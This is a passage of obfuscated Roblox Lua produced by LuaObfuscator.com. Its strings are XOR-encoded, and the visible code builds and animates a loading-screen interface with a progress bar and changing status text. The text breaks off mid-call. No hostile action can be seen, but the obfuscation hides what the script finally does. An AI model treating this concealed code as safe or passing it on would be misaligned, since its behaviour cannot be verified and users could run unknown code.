--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v166,v167) local v168={};for v202=1, #v166 do v6(v168,v0(v4(v1(v2(v166,v202,v202 + 1 )),v1(v2(v167,1 + (v202% #v167) ,1 + (v202% #v167) + 1 )))%256 ));end return v5(v168);end local v8={[v7("\238\239\212\36\226\190\213","\126\177\163\187\69\134\219\167")]=Instance.new(v7("\16\206\56\192\249\45\234\63\204","\156\67\173\74\165")),[v7("\11\154\72\31\178\0\84\53\186\76","\38\84\215\41\118\220\70")]=Instance.new(v7("\118\4\35\31\251","\158\48\118\66\114")),[v7("\148\16\25\34\127\160","\155\203\68\112\86\19\197")]=Instance.new(v7("\114\216\46\232\108\121\231\253\74","\152\38\189\86\156\32\24\133")),[v7("\195\115\162\85\255\69\174\86\232\94\168\72","\38\156\55\199")]=Instance.new(v7("\156\120\100\60\63\117\248\70\164","\35\200\29\28\72\115\20\154")),[v7("\38\143\222\200\136\62\61\23\184\248\210\140\43\61\23\190\197\214\130\34","\84\121\223\177\191\237\76")]=Instance.new(v7("\143\83\209\180\22\81\50\196\183","\161\219\54\169\192\90\48\80")),[v7("\118\97\18\32\77\75\20\54","\69\41\34\96")]=Instance.new(v7("\136\198\207\30\46\42\190\198\219","\75\220\163\183\106\98")),[v7("\61\147\134\54\222\7\150\138\53\220\14","\185\98\218\235\87")]=Instance.new(v7("\226\49\38\225\219\134\202\62\34\234","\202\171\92\71\134\190")),[v7("\22\226\35\154\39\196\62","\232\73\161\76")]=Instance.new(v7("\142\240\97\82\12\181\220\80","\126\219\185\34\61")),[v7("\51\254\76\125\121\101\246\244\31\236\95\96","\135\108\174\62\18\30\23\147")]=Instance.new(v7("\144\251\43\198\29","\167\214\137\74\171\120\206\83")),[v7("\180\211\61\79\246\162\153\161","\199\235\144\82\61\152")]=Instance.new(v7("\50\63\154\36\21\24\188\57","\75\103\118\217")),[v7("\248\119\127\26\173\27\201\64","\126\167\52\16\116\217")]=Instance.new(v7("\238\60\33\141\177","\156\168\78\64\224\212\121")),[v7("\56\205\170\220\9\235\183\156","\174\103\142\197")]=Instance.new(v7("\99\1\124\55\55\80\253\68","\152\54\72\63\88\69\62")),[v7("\235\231\225\78\218\193\252\15","\60\180\164\142")]=Instance.new(v7("\109\119\38\38\53\227\23\74","\114\56\62\101\73\71\141")),[v7("\135\220\242\227\170\232\223\205\189\231\207\149","\164\216\137\187")]=Instance.new(v7("\231\207\22\160\167\250\2\215\232\37","\107\178\134\81\210\198\158")),[v7("\7\34\141\199\174\61\28\175\199\164\57\9\135\212","\202\88\110\226\166")]=Instance.new(v7("\239\0\129\246\198\240\12\144\254\218\215","\170\163\111\226\151")),[v7("\46\3\183\44\90\62\39\22\35","\73\113\80\210\88\46\87")]=Instance.new(v7("\172\35\201\7\235\132\31\206\0\238\145\56","\135\225\76\173\114"))};v8[v7("\37\193\183\177\168\184\181","\199\122\141\216\208\204\221")].IgnoreGuiInset=true;v8[v7("\146\241\31\241\124\243\191","\150\205\189\112\144\24")].ScreenInsets=Enum.ScreenInsets.DeviceSafeInsets;v8[v7("\26\168\176\77\0\141\3","\112\69\228\223\44\100\232\113")].ResetOnSpawn=false;v8[v7("\235\51\8\210\178\121\148","\230\180\127\103\179\214\28")].ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v8[v7("\179\41\80\71\224\68\242","\128\236\101\63\38\132\33")].Name=v7("\128\166\16\64\179\249","\175\204\201\113\36\214\139");v8[v7("\120\224\58\221\0\66\222","\100\39\172\85\188")].Parent=game:GetService(v7("\142\119\171\133\20\184\113","\83\205\24\217\224"));v8[v7("\217\232\204\52\232\227\223\60\235\192","\93\134\165\173")].AnchorPoint=Vector2.new(0.5,0.5);v8[v7("\129\223\192\203\52\232\160\127\179\247","\30\222\146\161\162\90\174\210")].BackgroundColor3=Color3.fromRGB(1358 -(371 + 944) ,1 + 42 ,39 + 4 );v8[v7("\218\99\113\3\235\104\98\11\232\75","\106\133\46\16")].BorderColor3=Color3.fromRGB(0,0,0);v8[v7("\103\13\114\245\84\102\74\33\126\249","\32\56\64\19\156\58")].BorderSizePixel=0 -0 ;v8[v7("\101\229\228\95\84\212\146\91\197\224","\224\58\168\133\54\58\146")].ClipsDescendants=true;v8[v7("\102\123\74\244\123\160\149\10\84\83","\107\57\54\43\157\21\230\231")].Position=UDim2.new(1086.499618024 -(686 + 400) ,0,0.498148113 + 0 ,0);v8[v7("\228\166\16\252\183\250\221\218\134\20","\175\187\235\113\149\217\188")].Size=UDim2.new(229 -(73 + 156) ,387,0 + 0 ,1036 -(721 + 90) );v8[v7("\3\130\128\69\237\95\106\61\162\132","\24\92\207\225\44\131\25")].Name=v7("\102\210\177\66\61\111\74\222\189","\29\43\179\216\44\123");v8[v7("\130\244\33\69\179\255\50\77\176\220","\44\221\185\64")].Parent=v8[v7("\62\203\71\94\119\4\245","\19\97\135\40\63")];v8[v7("\145\104\58\47\35\52","\81\206\60\83\91\79")].Font=Enum.Font.Gotham;v8[v7("\113\159\217\102\35\198","\196\46\203\176\18\79\163\45")].RichText=true;v8[v7("\135\22\119\10\40\254","\143\216\66\30\126\68\155")].Text=v7("\246\202\83\252\136\144\220\232\164\198\20\139\153\236\213\191\130\221\15","\129\202\168\109\171\165\195\183");v8[v7("\29\108\62\204\210\17","\134\66\56\87\184\190\116")].TextColor3=Color3.fromRGB(3 + 252 ,827 -572 ,255);v8[v7("\3\5\0\175\21\238","\85\92\81\105\219\121\139\65")].TextSize=497 -(224 + 246) ;v8[v7("\194\135\89\81\112\218","\191\157\211\48\37\28")].TextWrapped=true;v8[v7("\224\43\253\8\54\218","\90\191\127\148\124")].BackgroundColor3=Color3.fromRGB(413 -158 ,469 -214 ,255);v8[v7("\71\179\39\3\116\130","\119\24\231\78")].BackgroundTransparency=1;v8[v7("\189\25\172\94\208\69","\113\226\77\197\42\188\32")].BorderColor3=Color3.fromRGB(0 + 0 ,0 + 0 ,0);v8[v7("\5\34\253\161\54\19","\213\90\118\148")].BorderSizePixel=0;v8[v7("\100\26\189\66\65\94","\45\59\78\212\54")].Position=UDim2.new(0.242894053 + 0 ,0,0.438016534 -0 ,0);v8[v7("\47\98\138\159\138\43","\144\112\54\227\235\230\78\205")].Size=UDim2.new(0 -0 ,200,513 -(203 + 310) ,2022 -(1238 + 755) );v8[v7("\140\28\6\232\220\94","\59\211\72\111\156\176")].Name=v7("\122\142\247\33\75","\77\46\231\131");v8[v7("\133\96\191\84\182\81","\32\218\52\214")].Parent=v8[v7("\113\58\48\161\255\150\87\91\67\18","\58\46\119\81\200\145\208\37")];v8[v7("\20\168\53\191\170\175\63\59\152\57\163\167","\86\75\236\80\204\201\221")].Font=Enum.Font.Gotham;v8[v7("\77\101\114\150\253\153\123\81\99\140\241\133","\235\18\33\23\229\158")].Text=v7("\124\181\192\191\89\180\198\245\30\244","\219\48\218\161");v8[v7("\219\85\121\90\216\93\233\244\101\117\70\213","\128\132\17\28\41\187\47")].TextColor3=Color3.fromRGB(122,122,9 + 113 );v8[v7("\62\22\3\41\94\19\59\22\46\84\14\60","\61\97\82\102\90")].TextSize=14;v8[v7("\147\10\174\88\196\69\23\25\184\39\164\69","\105\204\78\203\43\167\55\126")].TextWrapped=true;v8[v7("\154\142\38\13\16\22\206\65\177\163\44\16","\49\197\202\67\126\115\100\167")].BackgroundColor3=Color3.fromRGB(1789 -(709 + 825) ,469 -214 ,371 -116 );v8[v7("\8\127\218\58\131\68\87\39\79\214\38\142","\62\87\59\191\73\224\54")].BackgroundTransparency=865 -(196 + 668) ;v8[v7("\216\38\255\218\228\16\243\217\243\11\245\199","\169\135\98\154")].BorderColor3=Color3.fromRGB(0 -0 ,0,0 -0 );v8[v7("\244\83\33\71\254\33\193\219\99\45\91\243","\168\171\23\68\52\157\83")].BorderSizePixel=0;v8[v7("\203\85\240\190\38\63\142\228\101\252\162\43","\231\148\17\149\205\69\77")].Position=UDim2.new(0,833 -(171 + 662) ,0.834710717,93 -(4 + 89) );v8[v7("\191\131\194\232\84\237\137\183\211\242\88\241","\159\224\199\167\155\55")].Size=UDim2.new(0 -0 ,387,0 + 0 ,127 -98 );v8[v7("\200\215\57\193\244\225\53\194\227\250\51\220","\178\151\147\92")].Name=v7("\168\248\95\49\0\69\106\152\244\67\60","\26\236\157\44\82\114\44");v8[v7("\21\10\208\72\41\60\220\75\62\39\218\85","\59\74\78\181")].Parent=v8[v7("\26\252\91\83\189\3\195\91\87\182","\211\69\177\58\58")];v8[v7("\136\213\118\226\236\217\190\235\126\220\228\202\176\236\119\244\253\194\184\235","\171\215\133\25\149\137")].Font=Enum.Font.Gotham;v8[v7("\222\248\61\237\234\34\245\76\230\225\63\251\232\57\242\67\245\193\61\244","\34\129\168\82\154\143\80\156")].Text=v7("\176\190\39\2\69\79\157\128\242\0\8\90\71\153\145\242\27\30\74","\233\229\210\83\107\40\46");v8[v7("\254\114\61\193\0\211\75\60\209\44\204\67\53\223\11\192\86\59\217\11","\101\161\34\82\182")].TextColor3=Color3.fromRGB(75 + 115 ,1676 -(35 + 1451) ,1643 -(28 + 1425) );v8[v7("\215\61\86\233\222\240\139\32\239\36\84\255\220\235\140\47\252\4\86\240","\78\136\109\57\158\187\130\226")].TextSize=2007 -(941 + 1052) ;v8[v7("\1\15\246\230\59\45\240\255\57\22\244\240\57\54\247\240\42\54\246\255","\145\94\95\153")].TextWrapped=true;v8[v7("\194\253\27\194\75\165\244\195\19\252\67\182\250\196\26\212\90\190\242\195","\215\157\173\116\181\46")].BackgroundColor3=Color3.fromRGB(245 + 10 ,1769 -(822 + 692) ,363 -108 );v8[v7("\10\132\132\229\223\39\189\133\245\243\56\181\140\251\212\52\160\130\253\212","\186\85\212\235\146")].BackgroundTransparency=1 + 0 ;v8[v7("\253\177\25\233\60\252\81\204\134\63\243\56\233\81\204\128\2\247\54\224","\56\162\225\118\158\89\142")].BorderColor3=Color3.fromRGB(297 -(45 + 252) ,0 + 0 ,0 + 0 );v8[v7("\99\53\207\184\39\202\85\11\199\134\47\217\91\12\206\174\54\209\83\11","\184\60\101\160\207\66")].BorderSizePixel=0 -0 ;v8[v7("\14\178\115\171\52\144\117\178\54\171\113\189\54\139\114\189\37\139\115\178","\220\81\226\28")].Position=UDim2.new(433.242894053 -(114 + 319) ,0 -0 ,0.557851255 -0 ,0);v8[v7("\44\229\141\236\239\213\26\219\133\210\231\198\20\220\140\250\254\206\28\219","\167\115\181\226\155\138")].Size=UDim2.new(0 + 0 ,297 -97 ,0 -0 ,1992 -(556 + 1407) );v8[v7("\221\18\232\75\126\99\207\236\37\206\81\122\118\207\236\35\243\85\116\127","\166\130\66\135\60\27\17")].Name=v7("\116\69\217\112\34\77\68\201\92\61\69\77\199\123\49\80\67\193\123","\80\36\42\174\21");v8[v7("\113\32\56\109\75\2\62\116\73\57\58\123\73\25\57\123\90\25\56\116","\26\46\112\87")].Parent=v8[v7("\134\14\170\125\177\153\87\181\180\38","\212\217\67\203\20\223\223\37")];v8[v7("\133\174\186\215\190\132\188\193","\178\218\237\200")].Font=Enum.Font.Gotham;v8[v7("\137\150\244\213\178\188\242\195","\176\214\213\134")].Text=v7("\216\162\183\208\173\68\25\249\172\178\209\232\84\64\180\158\189\221\166\88\64","\57\148\205\214\180\200\54");v8[v7("\45\222\39\49\114\27\233\38","\22\114\157\85\84")].TextColor3=Color3.fromRGB(88,1294 -(741 + 465) ,553 -(170 + 295) );v8[v7("\251\232\1\193\89\255\188\215","\200\164\171\115\164\61\150")].TextSize=7 + 5 ;v8[v7("\129\215\17\64\135\183\224\16","\227\222\148\99\37")].TextWrapped=true;v8[v7("\12\113\64\243\253\58\70\65","\153\83\50\50\150")].BackgroundColor3=Color3.fromRGB(235 + 20 ,627 -372 ,212 + 43 );v8[v7("\98\85\97\25\119\162\89\78","\45\61\22\19\124\19\203")].BackgroundTransparency=1 + 0 ;v8[v7("\254\49\31\240\6\121\173\210","\217\161\114\109\149\98\16")].BorderColor3=Color3.fromRGB(0 + 0 ,1230 -(957 + 273) ,0 + 0 );v8[v7("\45\3\42\121\184\125\6\51","\20\114\64\88\28\220")].BorderSizePixel=0 + 0 ;v8[v7("\14\34\192\177\252\217\169\34","\221\81\97\178\212\152\176")].Position=UDim2.new(0.268733859,0,0.318181813,0 -0 );v8[v7("\242\196\15\254\30\196\243\14","\122\173\135\125\155")].Size=UDim2.new(0 -0 ,546 -367 ,0,143 -114 );v8[v7("\187\226\18\188\59\56\220\151","\168\228\161\96\217\95\81")].Visible=false;v8[v7("\228\242\60\89\43\94\207\194","\55\187\177\78\60\79")].Name=v7("\14\220\90\239\79\219\147","\224\77\174\63\139\38\175");v8[v7("\187\98\74\43\128\72\76\61","\78\228\33\56")].Parent=v8[v7("\241\83\179\10\139\232\108\179\14\128","\229\174\30\210\99")];v8[v7("\36\196\139\80\234\56\21\26\239\131\93","\89\123\141\230\49\141\93")].Image=v7("\251\101\226\28\74\5\188\102\225\27\94\88\252\115\250\3\8\4\240\126\251\67\17\89\224\116\226\67\79\67\247\44\175\93\73\28\162\34\160\84\69\28\162\37\174\93","\42\147\17\150\108\112");v8[v7("\48\143\32\126\224\237\35\167\47\122\235","\136\111\198\77\31\135")].ImageColor3=Color3.fromRGB(2006 -(389 + 1391) ,142 + 84 ,226);v8[v7("\61\32\170\87\186\225\59\168\0\12\171","\201\98\105\199\54\221\132\119")].ImageTransparency=0.74;v8[v7("\134\37\142\32\5\48\128\184\14\134\45","\204\217\108\227\65\98\85")].BackgroundColor3=Color3.fromRGB(27 + 228 ,255,255);v8[v7("\97\234\248\228\43\197\114\194\247\224\32","\160\62\163\149\133\76")].BackgroundTransparency=1;v8[v7("\233\137\0\46\196\211\140\12\45\198\218","\163\182\192\109\79")].BorderColor3=Color3.fromRGB(0,0 -0 ,951 -(783 + 168) );v8[v7("\11\15\13\193\242\49\10\1\194\240\56","\149\84\70\96\160")].BorderSizePixel=0 -0 ;v8[v7("\7\47\0\236\63\3\33\236\58\3\1","\141\88\102\109")].Size=UDim2.new(1 + 0 ,311 -(309 + 2) ,2 -1 ,0);v8[v7("\140\122\199\113\29\56\121\192\177\86\198","\161\211\51\170\16\122\93\53")].Visible=true;v8[v7("\196\135\191\41\252\171\158\41\249\171\190","\72\155\206\210")].ZIndex=1212.45 -(1090 + 122) ;v8[v7("\121\83\89\15\52\67\86\85\12\54\74","\83\38\26\52\110")].Parent=v8[v7("\103\58\38\79\86\49\53\71\85\18","\38\56\119\71")];v8[v7("\204\204\87\196\43\83\225","\54\147\143\56\182\69")].CornerRadius=UDim.new(0 + 0 ,50 -35 );v8[v7("\233\162\240\91\209\211\147","\191\182\225\159\41")].Name=v7("\8\29\58\91\142\149","\162\75\114\72\53\235\231");v8[v7("\179\31\75\240\93\7\158","\98\236\92\36\130\51")].Parent=v8[v7("\155\48\1\187\66\173\153\49\166\28\0","\80\196\121\108\218\37\200\213")];v8[v7("\63\67\16\112\76\28\143\19\96\32\126\89","\234\96\19\98\31\43\110")].BackgroundColor3=Color3.fromRGB(50,50,35 + 15 );v8[v7("\57\47\64\200\171\96\142\21\12\112\198\190","\235\102\127\50\167\204\18")].BorderColor3=Color3.fromRGB(1118 -(628 + 490) ,0,0 + 0 );v8[v7("\111\145\231\44\67\60\85\178\230\1\69\60","\78\48\193\149\67\36")].BorderSizePixel=0 -0 ;v8[v7("\15\46\146\23\70\34\27\147\11\99\49\12","\33\80\126\224\120")].ClipsDescendants=true;v8[v7("\211\152\17\203\91\254\173\16\215\126\237\186","\60\140\200\99\164")].Position=UDim2.new(0.255813956 -0 ,0,774.75111109 -(431 + 343) ,0 -0 );v8[v7("\184\196\22\41\165\149\241\23\53\128\134\230","\194\231\148\100\70")].Size=UDim2.new(0 -0 ,149 + 39 ,0,18);v8[v7("\121\124\211\172\241\218\67\95\210\129\247\218","\168\38\44\161\195\150")].Visible=true;v8[v7("\191\204\144\121\55\250\179\5\147\222\131\100","\118\224\156\226\22\80\136\214")].Name=v7("\114\252\86\135\80\235\74\147\96\239\75","\224\34\142\57");v8[v7("\225\151\215\210\116\227\88\29\205\133\196\207","\110\190\199\165\189\19\145\61")].Parent=v8[v7("\229\198\118\225\133\225\200\234\122\237","\167\186\139\23\136\235")];v8[v7("\37\150\135\31\20\176\154\92","\109\122\213\232")].CornerRadius=UDim.new(0 + 0 ,1710 -(556 + 1139) );v8[v7("\209\212\173\34\224\242\176\97","\80\142\151\194")].Name=v7("\32\201\101\66\6\212","\44\99\166\23");v8[v7("\67\212\38\36\61\161\110\166","\196\28\151\73\86\83")].Parent=v8[v7("\204\51\59\31\133\74\29\101\224\33\40\2","\22\147\99\73\112\226\56\120")];v8[v7("\135\86\237\251\153\189\123\246","\237\216\21\130\149")].BackgroundColor3=Color3.fromRGB(255,255,270 -(6 + 9) );v8[v7("\189\109\80\81\164\204\80\150","\62\226\46\63\63\208\169")].BorderColor3=Color3.fromRGB(0,0 + 0 ,0 + 0 );v8[v7("\218\58\90\141\11\8\33\74","\62\133\121\53\227\127\109\79")].BorderSizePixel=0;v8[v7("\47\55\61\251\194\171\172\4","\194\112\116\82\149\182\206")].Position=UDim2.new(169 -(28 + 141) ,0 + 0 , -0.000001695421,0 -0 );v8[v7("\6\139\67\22\212\231\0\45","\110\89\200\44\120\160\130")].Size=UDim2.new(0 + 0 ,0,1317 -(486 + 831) ,46 -28 );v8[v7("\148\224\68\72\87\79\53\89","\45\203\163\43\38\35\42\91")].Name=v7("\241\138\210\55\130\167\64","\52\178\229\188\67\231\201");v8[v7("\30\98\95\10\227\89\45\53","\67\65\33\48\100\151\60")].Parent=v8[v7("\224\215\188\215\244\205\226\189\203\209\222\245","\147\191\135\206\184")];v8[v7("\187\11\169\211\214\86\160\214","\210\228\72\198\161\184\51")].CornerRadius=UDim.new(0 -0 ,15);v8[v7("\9\106\252\2\125\203\36\27","\174\86\41\147\112\19")].Name=v7("\120\15\159\5\32\29","\203\59\96\237\107\69\111\113");v8[v7("\27\53\163\243\63\245\197\118","\183\68\118\204\129\81\144")].Parent=v8[v7("\49\142\127\234\31\135\0\185","\226\110\205\16\132\107")];v8[v7("\212\224\239\203\79\238\209\179","\33\139\163\128\185")].CornerRadius=UDim.new(0,15);v8[v7("\104\123\11\204\89\93\22\141","\190\55\56\100")].Name=v7("\117\160\46\16\22\241","\147\54\207\92\126\115\131");v8[v7("\50\18\58\111\3\123\31\98","\30\109\81\85\29\109")].Parent=v8[v7("\192\92\85\191\56\248\238\254\124\81","\156\159\17\52\214\86\190")];v8[v7("\145\218\148\155\188\238\185\181\171\225\169\237","\220\206\143\221")].Color=ColorSequence.new({ColorSequenceKeypoint.new(0 + 0 ,Color3.fromRGB(806 -551 ,255,255)),ColorSequenceKeypoint.new(1 + 0 ,Color3.fromRGB(22,75,161))});v8[v7("\185\72\4\48\202\205\214\143\120\35\3\137","\178\230\29\77\119\184\172")].Rotation=9 + 33 ;v8[v7("\202\139\35\60\101\249\241\183\15\21\99\169","\152\149\222\106\123\23")].Parent=v8[v7("\226\11\247\74\187\251\52\247\78\176","\213\189\70\150\35")];local v136={};do local v169=0;local v170;local v171;local v172;while true do if ((2 -1)==v169) then v172=nil;while true do if (v170==(290 -(23 + 267))) then v171=Instance.new(v7("\98\90\112\29\67\80\71\11\93\92\100\28","\104\47\53\20"));v171.Name=v7("\144\73\149\8\181\1\164\95","\111\195\44\225\124\220");v170=1;end if (v170==(1945 -(1129 + 815))) then v171.Parent=v8[v7("\231\106\15\114\175\174\202","\203\184\38\96\19\203")];v172=nil;v170=389 -(371 + 16) ;end if (2==v170) then function v172() local v227=1750 -(1326 + 424) ;local v228;while true do if (v227==(0 -0)) then v228={[v7("\13\122\109\77\203\13\118\97\85","\174\89\19\25\33")]=v7("\115\16\12\96\210\168\51\111\58\103\108\183\219\68\45\76","\107\79\114\50\46\151\231"),[v7("\29\163\166\42\152\48\167\212\48\169\187\29\143\33\163","\160\89\198\213\73\234\89\215")]=v7("\110\88\135\221\237","\165\40\17\212\158"),[v7("\208\240\47\33\39\225\208\13\61\50\192\215\9\49\42\224\221","\70\133\185\104\83")]=true,[v7("\52\87\75\45\219\1\86\87\8\200\22\96\74\43\203\8\64\64","\169\100\37\36\74")]=true,[v7("\33\137\171\93\1\147\167\84\52\130\186\68","\48\96\231\194")]=true,[v7("\239\85\1\43\0\250\174\128\195\93\28\34\12\214\171","\227\168\58\110\77\121\184\207")]=false,[v7("\92\51\176\70\168\249\112\166\112\59\173\79\164\213\117\140\95","\197\27\92\223\32\209\187\17")]=16646831874 -  -63503062 };return v228;end end end v136[v171]=v172;break;end end break;end if (v169==0) then v170=0;v171=nil;v169=1491 -(69 + 1421) ;end end end local function v137() local v173=Instance.new(v7("\47\80\192\250\15\108\192\233\10\79\215","\155\99\63\163"));v173.Name=v7("\174\222\160\137\188\150\175\208\175\140\190\129\144","\228\226\177\193\237\217");v173.Parent=v8[v7("\11\156\44\231\48\181\49","\134\84\208\67")];local v177=require;local v178=function(v203) local v204=0 + 0 ;local v205;while true do if (v204==0) then local v218=0;while true do if (v218==(0 -0)) then v205=v136[v203];if v205 then return v205();end v218=1777 -(421 + 1355) ;end if (v218==(1 -0)) then v204=1 + 0 ;break;end end end if (v204==(1084 -(286 + 797))) then return v177(v203);end end end;local v179=v173.Parent:FindFirstChild(v7("\62\173\143\82\53\190\135\81\22","\60\115\204\230"));local v180=v179:FindFirstChild(v7("\211\51\255\124\226","\16\135\90\139"));local v181=v179:FindFirstChild(v7("\112\113\21\48\92\93\104\64\125\9\61","\24\52\20\102\83\46\52"));local v182=v179:FindFirstChild(v7("\231\32\51\42\10\214","\111\164\79\65\68"));local v183=v179:FindFirstChild(v7("\246\214\148\219\60\227\200\222\170\211\47\237\207\215\130\202\39\229\200","\138\166\185\227\190\78"));local v184=v178(v173.Parent:FindFirstChild(v7("\248\113\209\35\91\45\30\216","\121\171\20\165\87\50\67")));local v185=game:GetService(v7("\242\47\188\51\183\49\195\42\175\63\186\7","\98\166\88\217\86\217"));local v186=7 -5 ;local v187;v180.Position=UDim2.new( -(0.517 -0),439 -(397 + 42) ,0.438 + 0 ,800 -(24 + 776) );v181.Position=UDim2.new(0 -0 ,785 -(222 + 563) ,1 -0 ,0 + 0 );v179.BackgroundTransparency=1;v183.TextTransparency=1;v173.Parent.MainFrame.ImageLabel.ImageTransparency=1;v173.Parent.MainFrame.ProgressBar.BackgroundTransparency=1;v173.Parent.MainFrame.ProgressBar.Content.BackgroundTransparency=191 -(23 + 167) ;if (v184.UIGradientEnabled==true) then v179:FindFirstChild(v7("\195\223\94\19\135\216\255\243\119\21","\188\150\150\25\97\230")).Enabled=false;end if v184.TitleText then v180.Text=v184.TitleText;end if v184.DescriptionText then v179:FindFirstChild(v7("\234\134\72\7\30\228\212\142\118\15\13\234\211\135\94\22\5\226\212","\141\186\233\63\98\108")).Text=v184.DescriptionText;end if (v184.ProgressBarEnabled==true) then v179:FindFirstChild(v7("\193\248\35\177\55\244\249\63\148\36\227","\69\145\138\76\214")).Visible=true;end if (v184.GoofyBackground==true) then v179:FindFirstChild(v7("\89\194\136\142\186\58\113\205\140\133","\118\16\175\233\233\223")).Visible=true;if v184.GoofyBackgroundID then v179:FindFirstChild(v7("\162\137\52\188\235\167\124\137\129\57","\29\235\228\85\219\142\235")).Image=v184.GoofyBackgroundID;end end function StartLoading() v185:Create(v179,TweenInfo.new(0.2),{[v7("\31\213\185\214\112\92\40\71\51\208\142\207\118\64\52\66\60\198\191\211\116\87","\50\93\180\218\189\23\46\71")]=0}):Play();wait(0.1);wait(1798.5 -(690 + 1108) );v185:Create(v173.Parent.MainFrame.ProgressBar,TweenInfo.new(0.2 + 0 ),{[v7("\252\165\88\71\67\206\71\203\170\95\120\86\221\70\205\180\90\94\65\210\75\199","\40\190\196\59\44\36\188")]=0}):Play();v185:Create(v173.Parent.MainFrame.ProgressBar.Content,TweenInfo.new(0.2 + 0 ),{[v7("\30\68\223\191\253\111\2\41\75\216\128\232\124\3\47\85\221\166\255\115\14\37","\109\92\37\188\212\154\29")]=0}):Play();v180:TweenPosition(UDim2.new(848.243 -(40 + 808) ,0 + 0 ,0.438,0 -0 ),Enum.EasingDirection.Out,Enum.EasingStyle.Quad,0.5 + 0 );v185:Create(v173.Parent.MainFrame.ImageLabel,TweenInfo.new(0.5 + 0 ),{[v7("\45\226\165\196\52\110\22\238\170\208\33\91\22\234\170\192\40","\58\100\143\196\163\81")]=0 + 0 }):Play();v185:Create(v183,TweenInfo.new(571.2 -(47 + 524) ),{[v7("\46\71\59\183\11\91\228\0\9\82\34\177\58\71\230\23","\110\122\34\67\195\95\41\133")]=0}):Play();wait(0.2 + 0 );v181:TweenPosition(UDim2.new(0,0 -0 ,0.835,0 -0 ),Enum.EasingDirection.Out,Enum.EasingStyle.Quad,0.5);v187=true;end function HideProgressBar() v185:Create(v173.Parent.MainFrame.ProgressBar.Content,TweenInfo.new(0.2 -0 ),{[v7("\87\176\88\65\209\103\190\78\68\210\65\163\90\68\197\101\176\73\79\216\118\168","\182\21\209\59\42")]=1}):Play();v185:Create(v173.Parent.MainFrame.ProgressBar,TweenInfo.new(1726.2 -(1165 + 561) ),{[v7("\149\86\198\22\38\172\184\66\203\25\21\172\182\89\214\13\32\172\178\89\198\4","\222\215\55\165\125\65")]=1 + 0 }):Play();end function FinishLoading() local v206=0 -0 ;while true do if (v206==3) then v187=false;break;end if (v206==(0 + 0)) then v185:Create(v180,TweenInfo.new(479.2 -(341 + 138) ),{[v7("\24\212\222\14\198\211\236\68\63\193\199\8\247\207\238\83","\42\76\177\166\122\146\161\141")]=1 + 0 }):Play();v181:TweenPosition(UDim2.new(0 -0 ,326 -(89 + 237) ,3 -2 ,0),Enum.EasingDirection.Out,Enum.EasingStyle.Quad,0.5 -0 );wait(881.2 -(581 + 300) );v185:Create(v183,TweenInfo.new(1220.2 -(855 + 365) ),{[v7("\145\143\29\218\77\100\164\132\22\222\120\100\160\132\6\215","\22\197\234\101\174\25")]=2 -1 }):Play();v206=1;end if (v206==(1 + 0)) then wait(1235.2 -(1030 + 205) );v185:Create(v173.Parent.MainFrame.ProgressBar,TweenInfo.new(0.2 + 0 ),{[v7("\15\53\166\215\113\189\216\147\35\48\145\206\119\161\196\150\44\38\160\210\117\182","\230\77\84\197\188\22\207\183")]=1}):Play();v185:Create(v173.Parent.MainFrame.ProgressBar.Content,TweenInfo.new(0.2 + 0 ),{[v7("\219\21\197\247\139\179\255\32\247\16\242\238\141\175\227\37\248\6\195\242\143\184","\85\153\116\166\156\236\193\144")]=287 -(156 + 130) }):Play();v185:Create(v173.Parent.MainFrame.ImageLabel,TweenInfo.new(0.5 -0 ),{[v7("\141\237\76\180\225\52\182\225\67\160\244\1\182\229\67\176\253","\96\196\128\45\211\132")]=1 -0 }):Play();v206=2;end if (2==v206) then v185:Create(v179,TweenInfo.new(0.5 -0 ),{[v7("\23\140\120\84\213\189\187\205\59\137\79\77\211\161\167\200\52\159\126\81\209\182","\184\85\237\27\63\178\207\212")]=1}):Play();wait(1 + 0 );print(v7("\0\80","\63\104\57\105"));v173.Parent:Destroy();v206=3;end end end function SetText(v207) if ((v184.AnimatedText==true) and (v187==true)) then local v216=0;while true do if (v216==(0 + 0)) then wait(70 -(10 + 59) );v185:Create(v181,TweenInfo.new(0.2 + 0 ),{[v7("\63\130\188\80\63\149\165\74\24\151\165\86\14\137\167\93","\36\107\231\196")]=1}):Play();v216=1;end if (v216==(4 -3)) then wait(1164 -(671 + 492) );v181.Text=v207;v216=2 + 0 ;end if (v216==(1217 -(369 + 846))) then v185:Create(v181,TweenInfo.new(0.2 + 0 ),{[v7("\105\176\186\147\105\167\163\137\78\165\163\149\88\187\161\158","\231\61\213\194")]=0 + 0 }):Play();wait(1);break;end end else v181.Text=v207;end wait(1945.1 -(1036 + 909) );end wait(v186);StartLoading();wait(1 + 0 );SetText(v7("\37\162\60\119\0\163\58\51\40\190\46\118\29\190\115\61\71","\19\105\205\93"));v173.Parent.MainFrame.ProgressBar.Content:TweenSize(UDim2.new(0 -0 ,243 -(11 + 192) ,0 + 0 ,193 -(135 + 40) ),Enum.EasingDirection.Out,Enum.EasingStyle.Quint,0.2 -0 );local v195=Instance.new(v7("\132\7\218\132\51","\95\201\104\190\225"),workspace);v195.Name=v7("\129\202\198\207\131\196\192\202\170\207","\174\207\171\161");SetText(v7("\202\251\25\231\241\217\234\190\40\224\235\210\227\234\4\242\244\151\196\240\11\252\234\218\236\234\4\252\246\153\163\176","\183\141\158\109\147\152"));v173.Parent.MainFrame.ProgressBar.Content:TweenSize(UDim2.new(0,77,0,18),Enum.EasingDirection.Out,Enum.EasingStyle.Quint,0.2);SetText(v7("\14\16\246\13\63\26\239\2\43\73\199\2\56\0\166\47\36\12\231\24\98\71\168","\108\76\105\134"));v173.Parent.MainFrame.ProgressBar.Content:TweenSize(UDim2.new(0,61 + 39 ,0 -0 ,26 -8 ),Enum.EasingDirection.Out,Enum.EasingStyle.Quint,176.2 -(50 + 126) 